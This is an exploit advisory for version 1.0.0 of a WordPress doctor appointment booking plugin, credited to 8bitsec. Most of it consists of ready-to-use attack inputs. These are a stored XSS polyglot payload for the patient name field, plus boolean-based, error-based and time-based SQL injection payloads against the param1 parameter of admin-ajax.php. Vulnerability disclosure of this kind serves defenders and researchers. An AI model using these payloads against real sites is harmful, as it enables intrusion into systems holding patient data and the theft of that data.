WordPress Doctor Appointment Booking plugin version 1.0.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
35548918a4a71b860f4fef479dff2fe0
# Exploit Title: Wordpress Doctor Appointment Booking Plugin v1.0.0 - SQL Injection / XSS
# Date: 2018-01-01
# Exploit Author: 8bitsec
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/doctor-appointment-booking-wordpress-plugin/21215314
# Version: 1.0.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2018-01-01
Product & Service Introduction:
===============================
Doctor Appointment Booking Plugin
Technical Details & Description:
================================
Authenticated Stored XSS vulnerability found.
Proof of Concept (PoC):
=======================
Authenticated Stored XSS:
Patients > Edit Patient. Write the payload on the 'Name' input field:
john doejaVasCript:/*-/*`/*\\`/*\'/*\"/**/(/* */oNcliCk=alert() )
The payload will execute when the field is clicked.
SQL Injection:
On [param1] parameter.
https://localhost/[path]/wp-admin/admin-ajax.php
POST: action=ctmdc&page=modal-patient-profile&task=load_modal_page¶m1=11
Parameter: param1 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=ctmdc&page=modal-patient-profile&task=load_modal_page¶m1=11 AND 6200=6200
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: action=ctmdc&page=modal-patient-profile&task=load_modal_page¶m1=11 AND (SELECT 9175 FROM(SELECT COUNT(*),CONCAT(0x716b6b7871,(SELECT (ELT(9175=9175,1))),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: action=ctmdc&page=modal-patient-profile&task=load_modal_page¶m1=11 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]